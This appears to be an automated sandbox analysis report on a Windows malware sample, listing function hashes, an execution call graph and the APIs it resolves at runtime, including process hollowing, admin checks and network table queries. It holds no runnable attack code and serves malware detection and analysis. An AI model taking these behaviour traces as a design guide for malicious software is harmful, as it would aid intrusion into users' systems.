                                                              Function 0311D1F7 Relevance: .1, Instructions: 57COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2119088104.000000000311D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0311D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_311d000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9b7ddd7a086731bdfc3d36347521231777b7f6d018e947c39a7212cc8184ef59
                                                              • Instruction ID: 51fc5b43d689fcc12add57e9ed6fcff2f682e00a152ede3938c31f921dd11c8e
                                                              • Opcode Fuzzy Hash: 9b7ddd7a086731bdfc3d36347521231777b7f6d018e947c39a7212cc8184ef59
                                                              • Instruction Fuzzy Hash: E5219D76504240DFDB16CF54D9C4B66FF62FB88314F28C6A9DD090A656C33AD42ACBA2
                                                              Function 0311D4BF Relevance: .1, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2119088104.000000000311D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0311D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_311d000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                                                              • Instruction ID: c205463040ec8910d7cefaa07140e6daead244bd5bc69a09069ceece47500007
                                                              • Opcode Fuzzy Hash: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                                                              • Instruction Fuzzy Hash: DB11E976504240CFCF16CF14D5C4B66BF71FB88314F28C5A9D8450B65AC336D466CBA1
                                                              Function 0312D1CF Relevance: .1, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2119188126.000000000312D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0312D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_312d000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                                                              • Instruction ID: 5a7def2f4391be14cafe025276396e51a03ae999338ea984619f816ff63ee24c
                                                              • Opcode Fuzzy Hash: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                                                              • Instruction Fuzzy Hash: B1118B75504280DFDB16CF14D5C4B15FFA1FB88314F28C6ADD8494B696C33AD45ACB62

                                                              Non-executed Functions

                                                              Function 05311230 Relevance: .1, Instructions: 139COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2126506138.0000000005310000.00000040.00000800.00020000.00000000.sdmp, Offset: 05310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_5310000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 53ea40da2052cf65f53bf8d00dd679592c33e2d71e9c250b8f0bfe05f8c3d55c
                                                              • Instruction ID: 10c4c79ce3d79bb0b8f1656a09834858b1caa0716509f38575bb997a49397988
                                                              • Opcode Fuzzy Hash: 53ea40da2052cf65f53bf8d00dd679592c33e2d71e9c250b8f0bfe05f8c3d55c
                                                              • Instruction Fuzzy Hash: D251F774E042198FCB19CFA9C9805AEBBB2FF89304F24856AD908AB256D7349941CF61

                                                              Execution Graph

                                                              Execution Coverage:1.1%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:2.3%
                                                              Total number of Nodes:517
                                                              Total number of Limit Nodes:9
                                                              execution_graph 47135 404e26 WaitForSingleObject 47136 404e40 SetEvent CloseHandle 47135->47136 47137 404e57 closesocket 47135->47137 47138 404ed8 47136->47138 47139 404e64 47137->47139 47140 404e7a 47139->47140 47148 4050e4 83 API calls 47139->47148 47141 404e8c WaitForSingleObject 47140->47141 47142 404ece SetEvent CloseHandle 47140->47142 47149 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47141->47149 47142->47138 47145 404e9b SetEvent WaitForSingleObject 47150 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47145->47150 47147 404eb3 SetEvent CloseHandle CloseHandle 47147->47142 47148->47140 47149->47145 47150->47147 47151 434918 47152 434924 ___BuildCatchObject 47151->47152 47177 434627 47152->47177 47154 43492b 47156 434954 47154->47156 47472 434a8a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 47154->47472 47157 434993 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 47156->47157 47473 4442d2 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 47156->47473 47162 4349f3 47157->47162 47475 443487 35 API calls 5 library calls 47157->47475 47159 43496d 47161 434973 ___BuildCatchObject 47159->47161 47474 444276 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 47159->47474 47188 434ba5 47162->47188 47172 434a1f 47174 434a28 47172->47174 47476 443462 28 API calls _Atexit 47172->47476 47477 43479e 13 API calls 2 library calls 47174->47477 47178 434630 47177->47178 47478 434cb6 IsProcessorFeaturePresent 47178->47478 47180 43463c 47479 438fb1 10 API calls 4 library calls 47180->47479 47182 434641 47183 434645 47182->47183 47480 44415f IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47182->47480 47183->47154 47185 43464e 47186 43465c 47185->47186 47481 438fda 8 API calls 3 library calls 47185->47481 47186->47154 47482 436f10 47188->47482 47191 4349f9 47192 444223 47191->47192 47484 44f0d9 47192->47484 47194 434a02 47197 40ea00 47194->47197 47195 44422c 47195->47194 47488 446895 35 API calls 47195->47488 47490 41cbe1 LoadLibraryA GetProcAddress 47197->47490 47199 40ea1c GetModuleFileNameW 47495 40f3fe 47199->47495 47201 40ea38 47510 4020f6 47201->47510 47204 4020f6 28 API calls 47205 40ea56 47204->47205 47516 41beac 47205->47516 47209 40ea68 47542 401e8d 47209->47542 47211 40ea71 47212 40ea84 47211->47212 47213 40eace 47211->47213 47572 40fbee 116 API calls 47212->47572 47548 401e65 22 API calls 47213->47548 47216 40eade 47549 401e65 22 API calls 47216->47549 47217 40ea96 47573 401e65 22 API calls 47217->47573 47219 40eaa2 47574 410f72 36 API calls __EH_prolog 47219->47574 47221 40eafd 47550 40531e 28 API calls 47221->47550 47224 40eab4 47575 40fb9f 77 API calls 47224->47575 47225 40eb0c 47551 406383 28 API calls 47225->47551 47228 40eb18 47552 401fe2 47228->47552 47229 40eabd 47576 40f3eb 70 API calls 47229->47576 47235 401fd8 11 API calls 47237 40ef36 47235->47237 47236 401fd8 11 API calls 47238 40eb36 47236->47238 47467 443396 GetModuleHandleW 47237->47467 47564 401e65 22 API calls 47238->47564 47240 40eb3f 47565 401fc0 28 API calls 47240->47565 47242 40eb4a 47566 401e65 22 API calls 47242->47566 47244 40eb63 47567 401e65 22 API calls 47244->47567 47246 40eb7e 47247 40ebe9 47246->47247 47577 406c59 28 API calls 47246->47577 47568 401e65 22 API calls 47247->47568 47250 40ebab 47251 401fe2 28 API calls 47250->47251 47252 40ebb7 47251->47252 47255 401fd8 11 API calls 47252->47255 47253 40ebf6 47254 40ec3d 47253->47254 47579 413584 RegOpenKeyExA RegQueryValueExA RegCloseKey 47253->47579 47569 40d0a4 47254->47569 47257 40ebc0 47255->47257 47578 413584 RegOpenKeyExA RegQueryValueExA RegCloseKey 47257->47578 47258 40ec43 47259 40eac6 47258->47259 47581 41b354 33 API calls 47258->47581 47259->47235 47263 40ebdf 47263->47247 47264 40f38a 47263->47264 47664 4139e4 30 API calls 47264->47664 47265 40ec5e 47267 40ecb1 47265->47267 47582 407751 RegOpenKeyExA RegQueryValueExA RegCloseKey 47265->47582 47266 40ec21 47266->47254 47580 4139e4 30 API calls 47266->47580 47587 401e65 22 API calls 47267->47587 47272 40f3a0 47665 4124b0 65 API calls ___scrt_fastfail 47272->47665 47273 40ecba 47280 40ecc6 47273->47280 47281 40eccb 47273->47281 47274 40ec79 47275 40ec87 47274->47275 47276 40ec7d 47274->47276 47585 401e65 22 API calls 47275->47585 47583 407773 30 API calls 47276->47583 47588 407790 CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 47280->47588 47589 401e65 22 API calls 47281->47589 47282 40ec82 47584 40729b 97 API calls 47282->47584 47287 40f3ba 47667 413a5e RegOpenKeyExW RegDeleteValueW 47287->47667 47288 40ecd4 47590 41bcef 28 API calls 47288->47590 47290 40ec90 47290->47267 47294 40ecac 47290->47294 47291 40ecdf 47591 401f13 28 API calls 47291->47591 47586 40729b 97 API calls 47294->47586 47295 40f3cd 47668 401f09 11 API calls 47295->47668 47296 40ecea 47592 401f09 11 API calls 47296->47592 47300 40f3d7 47669 401f09 11 API calls 47300->47669 47302 40ecf3 47593 401e65 22 API calls 47302->47593 47303 40f3e0 47670 40dd7d 27 API calls 47303->47670 47306 40ecfc 47594 401e65 22 API calls 47306->47594 47307 40f3e5 47671 414f65 167 API calls _strftime 47307->47671 47311 40ed16 47595 401e65 22 API calls 47311->47595 47313 40ed30 47596 401e65 22 API calls 47313->47596 47315 40ed49 47316 40edbb 47315->47316 47597 401e65 22 API calls 47315->47597 47317 40edc5 47316->47317 47324 40ef41 ___scrt_fastfail 47316->47324 47319 40edce 47317->47319 47325 40ee4a 47317->47325 47603 401e65 22 API calls 47319->47603 47321 40edd7 47604 401e65 22 API calls 47321->47604 47322 40ed5e _wcslen 47322->47316 47598 401e65 22 API calls 47322->47598 47614 413733 RegOpenKeyExA RegQueryValueExA RegCloseKey 47324->47614 47349 40ee45 ___scrt_fastfail 47325->47349 47327 40ede9 47605 401e65 22 API calls 47327->47605 47328 40ed79 47599 401e65 22 API calls 47328->47599 47332 40edfb 47606 401e65 22 API calls 47332->47606 47333 40ed8e 47600 40da6f 31 API calls 47333->47600 47334 40ef8c 47615 401e65 22 API calls 47334->47615 47337 40ee24 47607 401e65 22 API calls 47337->47607 47338 40efb1 47616 402093 28 API calls 47338->47616 47340 40eda1 47601 401f13 28 API calls 47340->47601 47342 40edad 47602 401f09 11 API calls 47342->47602 47346 40ee35 47608 40ce34 45 API calls _wcslen 47346->47608 47347 40efc3 47617 4137aa 14 API calls 47347->47617 47348 40edb6 47348->47316 47349->47325 47609 413982 31 API calls 47349->47609 47353 40eede ctype 47610 401e65 22 API calls 47353->47610 47354 40efd9 47618 401e65 22 API calls 47354->47618 47356 40efe5 47619 43bb2c 39 API calls _strftime 47356->47619 47359 40eff2 47361 40f01f 47359->47361 47620 41ce2c 86 API calls ___scrt_fastfail 47359->47620 47360 40eef5 47360->47334 47611 401e65 22 API calls 47360->47611 47621 402093 28 API calls 47361->47621 47364 40ef12 47612 41bcef 28 API calls 47364->47612 47365 40f003 CreateThread 47365->47361 47779 41d4ee 10 API calls 47365->47779 47368 40ef1e 47613 40f4af 103 API calls 47368->47613 47369 40f034 47622 402093 28 API calls 47369->47622 47372 40f043 47623 41b580 79 API calls 47372->47623 47373 40ef23 47373->47334 47375 40ef2a 47373->47375 47375->47259 47376 40f048 47624 401e65 22 API calls 47376->47624 47378 40f054 47625 401e65 22 API calls 47378->47625 47380 40f066 47626 401e65 22 API calls 47380->47626 47382 40f086 47627 43bb2c 39 API calls _strftime 47382->47627 47384 40f093 47628 401e65 22 API calls 47384->47628 47386 40f09e 47629 401e65 22 API calls 47386->47629 47388 40f0af 47630 401e65 22 API calls 47388->47630 47390 40f0c4 47631 401e65 22 API calls 47390->47631 47392 40f0d5 47393 40f0dc StrToIntA 47392->47393 47632 409e1f 169 API calls _wcslen 47393->47632 47395 40f0ee 47633 401e65 22 API calls 47395->47633 47397 40f0f7 47398 40f13c 47397->47398 47634 43455e 47397->47634 47642 401e65 22 API calls 47398->47642 47403 40f11f 47406 40f126 CreateThread 47403->47406 47404 40f194 47644 401e65 22 API calls 47404->47644 47405 40f14c 47405->47404 47407 43455e new 22 API calls 47405->47407 47406->47398 47783 41a045 102 API calls 2 library calls 47406->47783 47409 40f161 47407->47409 47643 401e65 22 API calls 47409->47643 47411 40f173 47416 40f17a CreateThread 47411->47416 47412 40f207 47650 401e65 22 API calls 47412->47650 47413 40f19d 47413->47412 47645 401e65 22 API calls 47413->47645 47416->47404 47780 41a045 102 API calls 2 library calls 47416->47780 47417 40f1b9 47646 401e65 22 API calls 47417->47646 47418 40f255 47655 41b69e 79 API calls 47418->47655 47419 40f210 47419->47418 47651 401e65 22 API calls 47419->47651 47423 40f1ce 47647 40da23 31 API calls 47423->47647 47424 40f25e 47656 401f13 28 API calls 47424->47656 47425 40f225 47652 401e65 22 API calls 47425->47652 47427 40f269 47657 401f09 11 API calls 47427->47657 47431 40f1e1 47648 401f13 28 API calls 47431->47648 47432 40f272 CreateThread 47437 40f293 CreateThread 47432->47437 47438 40f29f 47432->47438 47781 40f7e2 120 API calls 47432->47781 47433 40f23a 47653 43bb2c 39 API calls _strftime 47433->47653 47436 40f1ed 47649 401f09 11 API calls 47436->47649 47437->47438 47782 412132 137 API calls 47437->47782 47440 40f2b4 47438->47440 47441 40f2a8 CreateThread 47438->47441 47445 40f307 47440->47445 47658 402093 28 API calls 47440->47658 47441->47440 47777 412716 38 API calls ___scrt_fastfail 47441->47777 47443 40f1f6 CreateThread 47443->47412 47778 401be9 49 API calls _strftime 47443->47778 47444 40f247 47654 40c19d 7 API calls 47444->47654 47660 41353a RegOpenKeyExA RegQueryValueExA RegCloseKey 47445->47660 47448 40f2d7 47659 4052fd 28 API calls 47448->47659 47451 40f31f 47451->47303 47661 41bcef 28 API calls 47451->47661 47456 40f338 47662 413656 31 API calls 47456->47662 47461 40f34e 47663 401f09 11 API calls 47461->47663 47463 40f381 DeleteFileW 47464 40f388 47463->47464 47465 40f359 47463->47465 47666 41bcef 28 API calls 47464->47666 47465->47463 47465->47464 47466 40f36f Sleep 47465->47466 47466->47465 47468 434a15 47467->47468 47468->47172 47469 4434bf 47468->47469 47785 44323c 47469->47785 47472->47154 47473->47159 47474->47157 47475->47162 47476->47174 47477->47161 47478->47180 47479->47182 47480->47185 47481->47183 47483 434bb8 GetStartupInfoW 47482->47483 47483->47191 47485 44f0eb 47484->47485 47486 44f0e2 47484->47486 47485->47195 47489 44efd8 48 API calls 5 library calls 47486->47489 47488->47195 47489->47485 47491 41cc20 LoadLibraryA GetProcAddress 47490->47491 47492 41cc10 GetModuleHandleA GetProcAddress 47490->47492 47493 41cc49 44 API calls 47491->47493 47494 41cc39 LoadLibraryA GetProcAddress 47491->47494 47492->47491 47493->47199 47494->47493 47672 41b539 FindResourceA 47495->47672 47499 40f428 ctype 47682 4020b7 47499->47682 47502 401fe2 28 API calls 47503 40f44e 47502->47503 47504 401fd8 11 API calls 47503->47504 47505 40f457 47504->47505 47506 43bda0 ___std_exception_copy 21 API calls 47505->47506 47507 40f468 ctype 47506->47507 47688 406e13 47507->47688 47509 40f49b 47509->47201 47511 40210c 47510->47511 47512 4023ce 11 API calls 47511->47512 47513 402126 47512->47513 47514 402569 28 API calls 47513->47514 47515 402134 47514->47515 47515->47204 47725 4020df 47516->47725 47518 41bf2f 47519 401fd8 11 API calls 47518->47519 47520 41bf61 47519->47520 47522 401fd8 11 API calls 47520->47522 47521 41bf31 47741 4041a2 28 API calls 47521->47741 47525 41bf69 47522->47525 47526 401fd8 11 API calls 47525->47526 47528 40ea5f 47526->47528 47527 41bf3d 47529 401fe2 28 API calls 47527->47529 47538 40fb52 47528->47538 47531 41bf46 47529->47531 47530 401fe2 28 API calls 47537 41bebf 47530->47537 47532 401fd8 11 API calls 47531->47532 47534 41bf4e 47532->47534 47533 401fd8 11 API calls 47533->47537 47535 41cec5 28 API calls 47534->47535 47535->47518 47537->47518 47537->47521 47537->47530 47537->47533 47729 4041a2 28 API calls 47537->47729 47730 41cec5 47537->47730 47539 40fb5e 47538->47539 47541 40fb65 47538->47541 47767 402163 11 API calls 47539->47767 47541->47209 47543 402163 47542->47543 47544 40219f 47543->47544 47768 402730 11 API calls 47543->47768 47544->47211 47546 402184 47769 402712 11 API calls std::_Deallocate 47546->47769 47548->47216 47549->47221 47550->47225 47551->47228 47553 401ff1 47552->47553 47560 402039 47552->47560 47554 4023ce 11 API calls 47553->47554 47555 401ffa 47554->47555 47556 40203c 47555->47556 47557 402015 47555->47557 47771 40267a 11 API calls 47556->47771 47770 403098 28 API calls 47557->47770 47561 401fd8 47560->47561 47562 4023ce 11 API calls 47561->47562 47563 401fe1 47562->47563 47563->47236 47564->47240 47565->47242 47566->47244 47567->47246 47568->47253 47772 401fab 47569->47772 47571 40d0ae CreateMutexA GetLastError 47571->47258 47572->47217 47573->47219 47574->47224 47575->47229 47577->47250 47578->47263 47579->47266 47580->47254 47581->47265 47582->47274 47583->47282 47584->47275 47585->47290 47586->47267 47587->47273 47588->47281 47589->47288 47590->47291 47591->47296 47592->47302 47593->47306 47594->47311 47595->47313 47596->47315 47597->47322 47598->47328 47599->47333 47600->47340 47601->47342 47602->47348 47603->47321 47604->47327 47605->47332 47606->47337 47607->47346 47608->47349 47609->47353 47610->47360 47611->47364 47612->47368 47613->47373 47614->47334 47615->47338 47616->47347 47617->47354 47618->47356 47619->47359 47620->47365 47621->47369 47622->47372 47623->47376 47624->47378 47625->47380 47626->47382 47627->47384 47628->47386 47629->47388 47630->47390 47631->47392 47632->47395 47633->47397 47638 434563 47634->47638 47635 43bda0 ___std_exception_copy 21 API calls 47635->47638 47636 40f10c 47641 401e65 22 API calls 47636->47641 47638->47635 47638->47636 47773 443001 7 API calls 2 library calls 47638->47773 47774 434c99 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47638->47774 47775 4352fb RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47638->47775 47641->47403 47642->47405 47643->47411 47644->47413 47645->47417 47646->47423 47647->47431 47648->47436 47649->47443 47650->47419 47651->47425 47652->47433 47653->47444 47654->47418 47655->47424 47656->47427 47657->47432 47658->47448 47660->47451 47661->47456 47662->47461 47663->47465 47664->47272 47666->47287 47667->47295 47668->47300 47669->47303 47670->47307 47776 41ada8 104 API calls 47671->47776 47673 41b556 LoadResource LockResource SizeofResource 47672->47673 47674 40f419 47672->47674 47673->47674 47675 43bda0 47674->47675 47681 4461b8 ___crtLCMapStringA 47675->47681 47676 4461f6 47692 44062d 20 API calls _Atexit 47676->47692 47678 4461e1 RtlAllocateHeap 47679 4461f4 47678->47679 47678->47681 47679->47499 47681->47676 47681->47678 47691 443001 7 API calls 2 library calls 47681->47691 47683 4020bf 47682->47683 47693 4023ce 47683->47693 47685 4020ca 47697 40250a 47685->47697 47687 4020d9 47687->47502 47689 4020b7 28 API calls 47688->47689 47690 406e27 47689->47690 47690->47509 47691->47681 47692->47679 47694 402428 47693->47694 47695 4023d8 47693->47695 47694->47685 47695->47694 47704 4027a7 11 API calls std::_Deallocate 47695->47704 47698 40251a 47697->47698 47699 402520 47698->47699 47700 402535 47698->47700 47705 402569 47699->47705 47715 4028e8 28 API calls 47700->47715 47703 402533 47703->47687 47704->47694 47716 402888 47705->47716 47707 40257d 47708 402592 47707->47708 47709 4025a7 47707->47709 47721 402a34 22 API calls 47708->47721 47723 4028e8 28 API calls 47709->47723 47712 40259b 47722 4029da 22 API calls 47712->47722 47714 4025a5 47714->47703 47715->47703 47717 402890 47716->47717 47718 402898 47717->47718 47724 402ca3 22 API calls 47717->47724 47718->47707 47721->47712 47722->47714 47723->47714 47726 4020e7 47725->47726 47727 4023ce 11 API calls 47726->47727 47728 4020f2 47727->47728 47728->47537 47729->47537 47731 41ced2 47730->47731 47732 41cf31 47731->47732 47736 41cee2 47731->47736 47733 41cf4b 47732->47733 47734 41d071 28 API calls 47732->47734 47751 41d1d7 28 API calls 47733->47751 47734->47733 47737 41cf1a 47736->47737 47742 41d071 47736->47742 47750 41d1d7 28 API calls 47737->47750 47738 41cf2d 47738->47537 47741->47527 47744 41d079 47742->47744 47743 41d0ab 47743->47737 47744->47743 47745 41d0af 47744->47745 47748 41d093 47744->47748 47762 402725 22 API calls 47745->47762 47752 41d0e2 47748->47752 47750->47738 47751->47738 47753 41d0ec __EH_prolog 47752->47753 47763 402717 22 API calls 47753->47763 47755 41d0ff 47764 41d1ee 11 API calls 47755->47764 47757 41d125 47758 41d15d 47757->47758 47765 402730 11 API calls 47757->47765 47758->47743 47760 41d144 47766 402712 11 API calls std::_Deallocate 47760->47766 47763->47755 47764->47757 47765->47760 47766->47758 47767->47541 47768->47546 47769->47544 47770->47560 47771->47560 47773->47638 47784 412829 61 API calls 47782->47784 47786 443248 _Atexit 47785->47786 47787 443396 _Atexit GetModuleHandleW 47786->47787 47795 443260 47786->47795 47789 443254 47787->47789 47789->47795 47819 4433da GetModuleHandleExW 47789->47819 47790 443268 47794 4432dd 47790->47794 47806 443306 47790->47806 47827 443ff0 20 API calls _Atexit 47790->47827 47798 4432f5 47794->47798 47828 444276 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 47794->47828 47807 445909 EnterCriticalSection 47795->47807 47796 443323 47811 443355 47796->47811 47797 44334f 47830 4577a9 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 47797->47830 47829 444276 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 47798->47829 47808 443346 47806->47808 47807->47790 47831 445951 LeaveCriticalSection 47808->47831 47810 44331f 47810->47796 47810->47797 47832 448d49 47811->47832 47814 443383 47817 4433da _Atexit 8 API calls 47814->47817 47815 443363 GetPEB 47815->47814 47816 443373 GetCurrentProcess TerminateProcess 47815->47816 47816->47814 47818 44338b ExitProcess 47817->47818 47820 443404 GetProcAddress 47819->47820 47821 443427 47819->47821 47822 443419 47820->47822 47823 443436 47821->47823 47824 44342d FreeLibrary 47821->47824 47822->47821 47825 43502b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 47823->47825 47824->47823 47826 443440 47825->47826 47826->47795 47827->47794 47828->47798 47829->47806 47831->47810 47833 448d6e 47832->47833 47837 448d64 47832->47837 47838 44854a 47833->47838 47836 44335f 47836->47814 47836->47815 47845 43502b 47837->47845 47839 448576 47838->47839 47840 44857a 47838->47840 47839->47840 47844 44859a 47839->47844 47852 4485e6 47839->47852 47840->47837 47842 4485a6 GetProcAddress 47843 4485b6 __crt_fast_encode_pointer 47842->47843 47843->47840 47844->47840 47844->47842 47846 435036 IsProcessorFeaturePresent 47845->47846 47847 435034 47845->47847 47849 435078 47846->47849 47847->47836 47859 43503c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47849->47859 47851 43515b 47851->47836 47853 448607 LoadLibraryExW 47852->47853 47854 4485fc 47852->47854 47855 448624 GetLastError 47853->47855 47857 44863c 47853->47857 47854->47839 47855->47857 47858 44862f LoadLibraryExW 47855->47858 47856 448653 FreeLibrary 47856->47854 47857->47854 47857->47856 47858->47857 47859->47851 47860 40165e 47861 401666 47860->47861 47862 401669 47860->47862 47863 4016a8 47862->47863 47865 401696 47862->47865 47864 43455e new 22 API calls 47863->47864 47867 40169c 47864->47867 47866 43455e new 22 API calls 47865->47866 47866->47867

                                                              Executed Functions

                                                              Function 0041CBE1 Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176libraryloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
                                                              • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CC19
                                                              • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
                                                              • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CC42
                                                              • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CC57
                                                              • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CC66
                                                              • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
                                                              • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
                                                              • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
                                                              • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
                                                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
                                                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
                                                              • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
                                                              • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CD06
                                                              • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CD17
                                                              • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040EA1C), ref: 0041CD28
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CD2B
                                                              • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CD3B
                                                              • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CD4B
                                                              • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040EA1C), ref: 0041CD5D
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CD60
                                                              • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040EA1C), ref: 0041CD6D
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CD70
                                                              • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CD84
                                                              • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CD98
                                                              • LoadLibraryA.KERNELBASE(Rstrtmgr,RmStartSession,?,?,?,?,0040EA1C), ref: 0041CDAA
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CDAD
                                                              • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040EA1C), ref: 0041CDBA
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CDBD
                                                              • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040EA1C), ref: 0041CDCA
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CDCD
                                                              • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040EA1C), ref: 0041CDDA
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CDDD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoad$HandleModule
